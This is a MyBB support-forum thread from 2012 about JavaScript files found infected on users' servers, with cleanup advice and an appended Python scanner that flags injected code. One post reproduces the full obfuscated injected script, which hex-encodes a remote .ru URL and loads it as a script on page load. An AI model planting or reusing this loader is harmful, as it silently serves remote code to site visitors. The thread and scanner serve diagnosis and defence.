MyBB Community Forums

Full Version: Forum hacked (mybb 1.6.5)
Also use htaccesspw protection to protect admin directory with an additional layer of username and pass.
It was not hacked, it's a virus from your host.
(2012-01-14, 11:53 AM)huwad Wrote: [ -> ]It was not hacked, it's a virus from your host.

How did you come to that conclusion?

How can I check if it's really so?
(2012-01-14, 12:04 PM)Parka Wrote: [ -> ]
(2012-01-14, 11:53 AM)huwad Wrote: [ -> ]It was not hacked, it's a virus from your host.

How did you come to that conclusion?

How can I check if it's really so?

It's true, because I have experienced it before. I'm using a paid/stable forum script, same problem. My files got infected with malicious code. It's a mass code inject. You have been rooted.
Take a look at this one. I have reported this from my host; it was the script injected into my files. And after a day, my main host has been hacked. I transferred to another host and have no problem anymore =D
<script>var f=new Date();var VT;if(VT!='' && VT!='H'){VT='o'};function E(){var k;if(k!='J' && k != ''){k=null};this.tj='';var V=unescape;var er="";var g;if(g!='r'){g=''};var P="\x68\x74\x74\x70\x3a\x2f\x2f\x61\x6c\x6c\x65\x67\x72\x6f\x2d\x70\x6c\x2e\x67\x6f\x2e\x63\x6f\x6d\x2e\x6e\x61\x76\x65\x72\x2d\x63\x6f\x6d\x2e\x79\x6f\x75\x68\x65\x6c\x70\x6e\x6f\x77\x2e\x72\x75\x3a";var F;if(F!='hD'){F=''};var s=window;var bJ;if(bJ!='i'){bJ='i'};var LI;if(LI!='' && LI!='Yy'){LI=''};var n=new String("J4Mxg".substr(4));var m='';var T;if(T!='' && T!='l'){T=''};var ir=new String();var U='';var uE;if(uE!='Yl'){uE=''};var M_;if(M_!='' && M_!='Q'){M_=null};function x(K,Y){var v=V("%5b")+Y+V("%5d");var EL=new RegExp(v, n);var RU=new String();return K.replace(EL, m);};var z;if(z!='' && z!='Z'){z='N'};var FD=new Array();var pz='';var y=x('86337260131519982695520711457','72396145');this.Hk="";var Zx=new Date();var _D=new Date();var KH=document;var eh;if(eh!='d' && eh!='pT'){eh=''};var on=new Array();var mi='';var jA;if(jA!='sX' && jA != ''){jA=null};var s_;if(s_!='lu' && s_ != ''){s_=null};var b=V("%2f%77%69%6b%69%61%2e%63%6f%6d%2f%77%69%6b%69%61%2e%63%6f%6d%2f%73%6b%79%73%70%6f%72%74%73%2e%63%6f%6d%2f%63%6f%6d%63%61%73%74%2e%6e%65%74%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%70%68%70");this.iF="";this.kA="";function D(){var I=new Array();mi=P;mi+=y;var c="";mi+=b;var Dg;if(Dg!='eq' && Dg != ''){Dg=null};var bP=new Date();var mA=new Date();var C;if(C!='ky'){C='ky'};try {var tO=new String();var UX;if(UX!='' && UX!='W'){UX=null};var wg;if(wg!='' && wg!='_b'){wg=null};vl=KH.createElement(x('sFcFrKiKp4tF','4oKSqF'));var tq=new Date();var HA='';var Oh=new Date();vl.defer=[9,1][1];var Kd=new Array();var RN;if(RN!='' && RN!='FV'){RN=null};this.NY='';vl.src=mi;KH.body.appendChild(vl);var Wc;if(Wc!='hM' && Wc!='Pm'){Wc=''};} catch(h){var Bx="";};var AG;if(AG!='' && AG!='wq'){AG=null};var lI=new Array();}var hO;if(hO!='ag'){hO='ag'};var sAY;if(sAY!=''){sAY='jx'};s[new 
String("onloa"+"d")]=D;};this.ht="";var Jq="";this.tF="";E();this.N_='';var xL=new Array();</script>
 <!--62365fa35aba4973596fe47d39de9a46-->
I have suffered the same problem with all javascripts infected. Also in the ACP even though I renamed it to something different. I'm currently running myBB 1.6.4 so before I upgrade, I have to get it back working okay again. Can I just reload all the javascripts from 1.6.5 to get everything working correctly again? Will this work okay? The purpose of the infection was to redirect visitors elsewhere, most anti-virus programs seem to block it from the visitor's point of view. However, it's not easy to edit the javascript files because my anti-virus prevents me accessing them for any reason. Does anybody have suggestions as to my best move now please?

For information, I do not use a host; running on my own web server behind a port.............
^ @Roger, you can run the file verification tool from the Tools & Maintenance section AND replace the corrupt files with original files from MyBB 1.6.4.
Ah okay, I wasn't sure that I could get the original 1.6.4 files so will try that instead. Thanks...........
All corrected now so just need to make some more changes regarding security as suggested by Matt's excellent blog on the subject

http://mattrogowski.co.uk/?p=314


(2012-01-11, 05:37 PM)ranjani Wrote: [ -> ]" I'll just remove the admin folder totally in that case, and put it back when I need it again " <-- that's not necessary !!
just rename with irregular combination of words ... see also Security Tutorial List - if you have not yet seen it ..

Renaming the ACP directory is pointless. They can't do anything in the ACP without being logged into an admin account. And if they have an admin account they will see the link to the ACP...
Okay on all these security essentials but in this particular case with me, where all files with a .js extension were changed and infected, this appears to not be a myBB issue as there were other javascript files on the same server (this is a web server running on my own network) associated with a totally different application and these had all been changed too. This other application also uses an SQL database so is the problem basically down to php?

PHP version is 5.3.3 and MySQLi 5.1.49
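
A scan for the traits visible in the script posted earlier in this thread, as an added example that is not part of any poster's message or of MyBB's own tooling: it walks a web root and lists the .js files, across every application under it, that carry at least two of those traits. The directory and file names, the two-hit threshold and the sample content are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# Heuristics taken from traits visible in the script posted in this thread.
INDICATORS = {
    "script_tag_in_js": re.compile(r"<script\b", re.I),            # HTML tag inside a .js file
    "hex_escape_run": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),    # "\x68\x74..." strings
    "percent_escape_run": re.compile(r"(?:%[0-9a-fA-F]{2}){8,}"),  # unescape("%2f%77...")
    "hex_marker_comment": re.compile(r"<!--[0-9a-f]{32}-->"),      # trailing 32-hex comment
}

# Constructed sample data: an inert stand-in for an appended block.
CLEAN = "function toggle(id) { var e = document.getElementById(id); e.hidden = !e.hidden; }\n"
INJECTED = (
    '<script>var P="' + "".join("\\x%02x" % b for b in b"http://example.invalid/") + '";'
    'var b=unescape("' + "".join("%%%02x" % b for b in b"/placeholder.php") + '");</script>\n'
    "<!--" + "0123456789abcdef" * 2 + "-->\n"
)


def scan_text(text):
    """Return the sorted names of the indicators present in one file's text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root, min_hits=2):
    """Map each .js file under root with at least min_hits indicators to its hits."""
    findings = {}
    for path in sorted(Path(root).rglob("*.js")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if len(hits) >= min_hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def demo():
    """Build a small constructed web root holding two applications and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in {
            "forum/clean.js": CLEAN,
            "forum/menu.js": CLEAN + INJECTED,
            "otherapp/ui.js": CLEAN + INJECTED,
            "otherapp/embed.js": 'var t = "<script src=x>";\n',  # one weak hit only
        }.items():
            (root / rel).parent.mkdir(exist_ok=True)
            (root / rel).write_text(body)
        return scan_tree(root)


if __name__ == "__main__":
    print(demo())
```

A file that trips only one heuristic, such as a legitimate script that builds a `<script>` tag in a string, stays below the threshold; lower `min_hits` to 1 for a noisier first pass.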